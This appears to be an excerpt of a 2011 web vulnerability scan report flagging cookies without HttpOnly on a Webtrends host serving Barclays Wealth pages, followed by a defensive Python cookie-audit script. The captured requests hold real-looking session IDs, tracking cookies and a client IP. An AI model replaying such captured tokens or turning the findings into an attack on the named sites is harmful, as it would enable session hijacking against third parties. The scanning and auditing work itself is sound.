Cookie: JSESSIONID=A3D550880A45CA7718800D08622321F7; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; _wt.mode-79569=e1f36dbd085f0088adcd; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200988e87

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:16 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=1836E1C2F530E7BCED230AB0A2091BE5; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d04610a68; Expires=Sun, 01-Jan-2012 00:02:17 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=045f6179; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93202c8abcc; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.26. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b54a03f64809f8cbd50b86a91e9b6353178946a097073d9486f5d14d8ab9f851302212cf9503a8449876319d516c73b3d90ae0d29bc0835de176840861ac5d45a71d007dfff6a1784b71ad1997714bc707b1b015a25d99a71f7dc9c51eb42268ba4dd1b6038a168a01b2785eb5353cf22e8e0dcb2762a98c05fa67c02be8455b2a1619d4a784ba94573781a0ffe39ac6a487bfba043f44e5c1cdc68c0b1017c81f6a118600c65a052675c44bdb0af1f5f58a04f76a5644ea7a3443727981281f51504281da0b6a9c20781d240801556985d2479c8aaba32aa9567a8f21bd3f11477c6bf3e5be33075e1f1fe070d7fcc2f813dc1b5a92d77e13e144c04f08a97ef1ce0ecbbc23edc1f507660f70bd21e6a55d7b270421d49169024f816acff3fa30f99ba0ef409b0d99564129556bd4d7144847463dd3a00b434394b89a151513edb5e04d8a5cba1819c2c8a198fb221b7448f30e83351e477ae947e224c6c3bec3542a61f9599e42ce92bcd1c57448452c54bde75edd7c16a6e8db79cf93ed2b9bdbae8279455dac5178762d13390d33e176f278bc038f4c166a35cf74c92614960917de7470493bb30e23955f1c57dad89603f343d1a247fdb281f7aa2c57ac2ea2d2fe2d80723e068ca15a1a91665359e814127b8ef712faf1ecf81cc4046d5cd6420397269483ac95a9c6736fbeb91e4ac1c5
75d6fc1d9425f0845b6a6e2c1ee92bc5a6f6807bbd716b34464234964f121c49d59fc0ee6b6323d7cb155ade6441b08ad77c623a8571704da4add295f01023c88074c2d385753d295284be5bb24dd1698cb970b1e7529f4bfea689f78951a43fe7c8d0dcde1efb8a11fe78f94a9d8c6f69bb43ef801fd554b4799bac07a8f0224798a1731ab37247daf39678f650d751ed722a6ee8e50d8d2c1617f73ac14fbeb384dc9eac0494071276be6f76a73bcab34e5b607b71d51c36c6ada24063f4119bcde4dc409e651fa7aedd9cd727fa83717f3b4bdd813f63800cae67522a21332e685c0d021e703c60009f1ea2f38701205a706043fb1171645a6892f952255b9aaeb802d49e23c98718a9f4bb071a8c2a2719f2027557a2015890d9e1293ac1c7a4befcddbe46f3294982f03782fe5a2f56a3e849aabaf98a483e64ada7cf059c0a45f26cd58714160ee0e33cdb0a9dfc39b88285f4df0d0bfb8ad3f03e84eddc81edc15a237f08348b0aab3202610250980c

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b54a03f64809f8cbd50b86a91e9b6353178946a097073d9486f5d14d8ab9f851302212cf9503a8449876319d516c73b3d90ae0d29bc0835de176840861ac5d45a71d007dfff6a1784b71ad1997714bc707b1b015a25d99a71f7dc9c51eb42268ba4dd1b6038a168a01b2785eb5353cf22e8e0dcb2762a98c05fa67c02be8455b2a1619d4a784ba94573781a0ffe39ac6a487bfba043f44e5c1cdc68c0b1017c81f6a118600c65a052675c44bdb0af1f5f58a04f76a5644ea7a3443727981281f51504281da0b6a9c20781d240801556985d2479c8aaba32aa9567a8f21bd3f11477c6bf3e5be33075e1f1fe070d7fcc2f813dc1b5a92d77e13e144c04f08a97ef1ce0ecbbc23edc1f507660f70bd21e6a55d7b270421d49169024f816acff3fa30f99ba0ef409b0d99564129556bd4d7144847463dd3a00b434394b89a151513edb5e04d8a5cba1819c2c8a198fb221b7448f30e83351e477ae947e224c6c3bec3542a61f9599e42ce92bcd1c57448452c54bde75edd7c16a6e8db79cf93ed2b9bdbae8279455dac5178762d13390d33e176f278bc038f4c166a35cf74c92614960917de7470493bb30e23955f1c57dad89603f343d1a247fdb281f7aa2c57ac2ea2d2fe2d80723e068ca15a1a91665359e814127b8ef712faf1ecf81cc4046d5cd6420397269483ac95a9c6736fbeb91e4ac1c575d6fc1d9425f0845b6a6e2c1ee92bc5a6f6
807bbd716b34464234964f121c49d59fc0ee6b6323d7cb155ade6441b08ad77c623a8571704da4add295f01023c88074c2d385753d295284be5bb24dd1698cb970b1e7529f4bfea689f78951a43fe7c8d0dcde1efb8a11fe78f94a9d8c6f69bb43ef801fd554b4799bac07a8f0224798a1731ab37247daf39678f650d751ed722a6ee8e50d8d2c1617f73ac14fbeb384dc9eac0494071276be6f76a73bcab34e5b607b71d51c36c6ada24063f4119bcde4dc409e651fa7aedd9cd727fa83717f3b4bdd813f63800cae67522a21332e685c0d021e703c60009f1ea2f38701205a706043fb1171645a6892f952255b9aaeb802d49e23c98718a9f4bb071a8c2a2719f2027557a2015890d9e1293ac1c7a4befcddbe46f3294982f03782fe5a2f56a3e849aabaf98a483e64ada7cf059c0a45f26cd58714160ee0e33cdb0a9dfc39b88285f4df0d0bfb8ad3f03e84eddc81edc15a237f08348b0aab3202610250980c HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-infinite-credit-card.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4274AF1E58216E26E0C3901397ECB67E; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d04610a68; _wt.mode-79569=fcdcc722e932029c8164; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2008dfa14

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:18 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=436AD3879C2C3E6CD9AACE2057A0AD3B; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d042f457f; Expires=Sun, 01-Jan-2012 00:02:19 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=01ca2f20; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93202d188d0; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.27. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/brokerage.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=245968D340BB5968593028CAA74B029E; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02b1d29a; _wt.mode-79569=fcdcc722e932033a5f6d; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05651019

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:10 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=366C424481F456C6E4820AE57695F69C; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d01953baa; Expires=Sun, 01-Jan-2012 00:02:11 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=030ea120; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93200feed40; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.28. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f75e4010c883f29dda6b0193c4ef67fb0912fa4b03e8dd8b40d2b455a54e7821f06486b72501acf4f0885cddaff2156f2d5adad553ea1ac27b31c311333ca1a47e8fb0aeb7e37a9e15f06133b60454ba4d766dfee1da533f35ec7b966610c010f2f054cd2afa88761deeaf7cbf4b2fec1687fa52935cd257806e69b32a03b566da5980642af3e6769f1fab519c223a2a7c4490f6c0e3d5247d86bde9ceacccbf88f5a21c2c09a38c9ed1941e797c935a3345970fca5b1b2774d756c14caba0b0ff4fb23a0f51e56179093f2a8d350e373328feb37070902c204a371316330fc89e1cd399b3ad39d8383eca7de72818567a76eefabc321e5a1517ef7dd8ebcbf314c90241f4b03351a216d1441dad65e4d469a2e766a297f5621b4b2ae170f5a84a73300d29cc8e68024f9c2e8caba07ab381baef3bed0d807376660c6b87910746493b15f8fb12415dd3af8f1d0e14e7a6ed5ad506e6434cdbcbbdccec645d291fb71fc02008282fb14bde3cdc99b9df5d757bf7559d4ddac4e7ac917c3004380ef7c857cb1d01f7adde5ebdc9f67080ddf58d2b1e5efc052a2029423c0e3ce776f178e65f8818406637ca22cb7344955c418920751b39e10720915a485cdadf9404a415daa24ff0e3d4faae2a5cfc7ea0d3af78d077315289ad5d13c53f540abb471578def215f9adb4f81cc100610d84145291229ed6ac95adcc263bb2e2481bc09574d7af19c12ea78f5b6a327b4bbb25c6aff1
812eb47c6366124333924a1d4f4ed19e97b43e372285cd1257823f40b0ded3763f3bd0777f4df3f7d592f34073c88a76c086857e3c7d5184bb0ab019d02a90a91aa7ab45c014b8bed9bd023423f3 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=699E9E21874BEC698EE100FEE3749834; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e932047ca940; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a025a8920

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:06 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=8E98275AEA21D3A7C00E2C03B5E15653; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d0561583b; Expires=Sun, 01-Jan-2012 00:02:07 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=0008fc39; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93203169299; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.29. http://ots.optimize.webtrends.com/ots/ots/js-3...[SNIP]...

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf0559961c04ff6b73c5ef264ce3454f322350b19450f01a37aa2582023bf1ea2a8ecba14b5a16f41e1d972e83dfcea631a09cdedb0e2d1cf1bf36b1fcc9d50b0e97c6c7f2771bda94ec18d418aa92f9995e0d7ff270578ff5c2998040d55e9ee160fb30b111242e37a04f7295178e6204b7f1f54e7598f7fc341f1c69ec74920ca9aa1f2a336fe1ee579fc545b83e9524f0947eb12134ed992f28acc7159ca99fd2bb61d45f71d5eb98ecc40d2ed52c74c055e86679bb50a24b3cee4c65a9ce0e04902473dade8348278a72c0b9d07377cf8ea11d7f5bbf18868c84ca4753db60f4fab47067ae6f4ae2e566da81dc021489552b5b01abe4fdbaf4f3bed995cef7c7ea25587e144a9168a01af6e6ca8280eb566da59976123f4e27a9d1aac489e383e2a785d95ffc9ebcf3e71c4e7be8bdf90f2d3a5b6083f4ee0cececa81041e15c81f7c08976ab71f417b27c45ddb48b6a2b6e250b3270f55e16f75083e249b321f2a264298ff3c25c5202b5b37060f2869afd35e90d2b3bb39b6497a8d21b23f1b4d7360ebfabc2c01455352b52b92a0d1e700b45917858c294bbb079c1212ab7efdc00fd0e67390dce619490a68a90dabe82c3e6c4523bbe2370e44903ec1fff26af491f3a80a8a30f117037707788fcc1c5c0e545bede61b1b5f83b28e140d41eab2e11d8b57b7124ad49abc9cb4645a2b4db844922e052a3fa45ce27b9080fd9d5b3f35a355ce4bd6debbbcc27738506f0ba79e08934a51f4abdd5be999a924dc8cf28c29405bf80125727f43370b60e421f42fb65b814a1037319a24cb7118940f44d02e754b3fb5002692544e0c8fdcc05bf447d1f54cf0b4d2f6fa2e5eab7ef6d2fa2e872533078eab591fc1660608ef17462cd9f445fdfee2ae179215751de5723ae413e5c4a1d6a6913776a484080cd69a7f84ff07952fa48a017e306b1ebe7897fcf3822ae0716932441531c4181a1a1ec184818828263f938b451d976b1ab58cdc6d3c20d37a7f48f5f980c7f34474938722c484d07360785fd1ed5db043df2991ac1ff1a04ec51daff296a1d301a337a3c7918c8f4dab8c15af2cfd449fda6b6cb311e68618d215ac6ca2bf10bfe3611788ee7015b2761bcbfb8d78a653d451b9752a3eb3b05dde2b4343a06a9748bfe5d3d999fe54900f1124be3e75f661cce54c016d7c29d8133993a5a21032a211cec0e6df46cc6e48f5f1d79bdf27ff85762a311e89853a66d55bae30542520607c390a59021e796565519f48f7f3880c270f7d6045a5417d365a6e9cf602200c9da6e950819f71cbd04da3f3be054bd67e261af3196b1ebe023d1774

Issue detail

The cookies issued in the response below (see its Set-Cookie headers) do not have the HttpOnly flag set. The JSESSIONID cookie appears to contain a session token, which may increase the risk associated with this issue, because script running in the page (for example through an XSS flaw) can read a non-HttpOnly cookie via document.cookie. You should review the contents of the cookies to determine their function.
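The finding repeated throughout this section can be checked mechanically rather than by eye. The Python script below is an added example written for this report; it is not the scanner's code and not Webtrends' code. It parses the Set-Cookie headers of a captured response, skips cookies whose Expires date is already in the past relative to the response's own Date header (the _wt.conversion cookie above, with Expires in 1970, is a deletion rather than a live cookie), flags every remaining cookie that lacks HttpOnly or Secure, marks names that look like session identifiers, and shows the hardened form of the header. The sample response is constructed from the headers in this report with the long token values shortened and one hypothetical "hardened" cookie added for contrast; the Secure check assumes the site is meant to be served over HTTPS, so pass require_secure=False for a plain-HTTP host like the one scanned here.

```python
"""Audit Set-Cookie headers in a captured HTTP response for missing HttpOnly/Secure.

Added example for this report; not part of the XSS.CX scanner or of Webtrends.
"""
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Constructed sample modelled on the responses in this report (token values shortened).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 03 Oct 2011 00:02:06 GMT\r\n"
    "Server: Apache-Coyote/1.1\r\n"
    "X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1\r\n"
    "Set-Cookie: JSESSIONID=8E98275AEA21D3A7C00E2C03B5E15653; Path=/ots\r\n"
    "Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52e; "
    "Expires=Sun, 01-Jan-2012 00:02:07 GMT; Path=/\r\n"
    "Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=0008fc39; "
    "Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/\r\n"
    "Set-Cookie: _wt.mode-79569=fcdcc722e93203169299; Path=/\r\n"
    "Set-Cookie: hardened=abc123; Path=/; Secure; HttpOnly\r\n"  # hypothetical, for contrast
    "Content-Length: 0\r\n"
    "\r\n"
)

# Substrings that suggest a cookie carries a session token (heuristic only).
SESSION_NAME_HINTS = ("jsessionid", "phpsessid", "asp.net_sessionid", "session")


def parse_set_cookie(header_value):
    """Split a Set-Cookie value into (name, value, attrs).

    Attribute names are lower-cased; valueless flags such as HttpOnly map to True.
    Only ';' is a separator, so an Expires value containing a comma stays intact.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value, attrs


def is_deletion(attrs, reference):
    """True when the cookie is already expired at `reference`, i.e. it is a deletion.

    Max-Age wins over Expires (RFC 6265). Unparseable dates count as live so the
    cookie is still audited rather than silently skipped.
    """
    if "max-age" in attrs:
        try:
            return int(attrs["max-age"]) <= 0
        except ValueError:
            return False
    expires = attrs.get("expires")
    if isinstance(expires, str):
        try:
            return parsedate_to_datetime(expires) <= reference
        except (TypeError, ValueError):
            return False
    return False


def audit_response(raw_response, require_secure=True):
    """Return findings for live cookies set without HttpOnly (and optionally Secure).

    Expiry is judged against the response's own Date header, so a capture taken
    earlier is audited as the browser would have seen it at the time.
    """
    head = raw_response.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        key, sep, val = line.partition(":")
        if sep:
            headers.append((key.strip().lower(), val.strip()))

    reference = datetime.now(timezone.utc)
    for key, val in headers:
        if key == "date":
            try:
                reference = parsedate_to_datetime(val)
            except (TypeError, ValueError):
                pass

    wanted = ["httponly"] + (["secure"] if require_secure else [])
    findings = []
    for key, val in headers:
        if key != "set-cookie":
            continue
        name, _, attrs = parse_set_cookie(val)
        if is_deletion(attrs, reference):
            continue
        missing = [flag for flag in wanted if flag not in attrs]
        if missing:
            findings.append({
                "name": name,
                "missing": missing,
                "session_like": any(h in name.lower() for h in SESSION_NAME_HINTS),
            })
    return findings


def harden_set_cookie(header_value):
    """Return the same Set-Cookie value with Secure and HttpOnly appended if absent."""
    _, _, attrs = parse_set_cookie(header_value)
    hardened = header_value.rstrip().rstrip(";")
    for flag in ("Secure", "HttpOnly"):
        if flag.lower() not in attrs:
            hardened += "; " + flag
    return hardened


if __name__ == "__main__":
    for finding in audit_response(SAMPLE_RESPONSE):
        tag = " (looks like a session token)" if finding["session_like"] else ""
        print(f"{finding['name']}: missing {', '.join(finding['missing'])}{tag}")
    print(harden_set_cookie("JSESSIONID=8E98275AEA21D3A7C00E2C03B5E15653; Path=/ots"))
```

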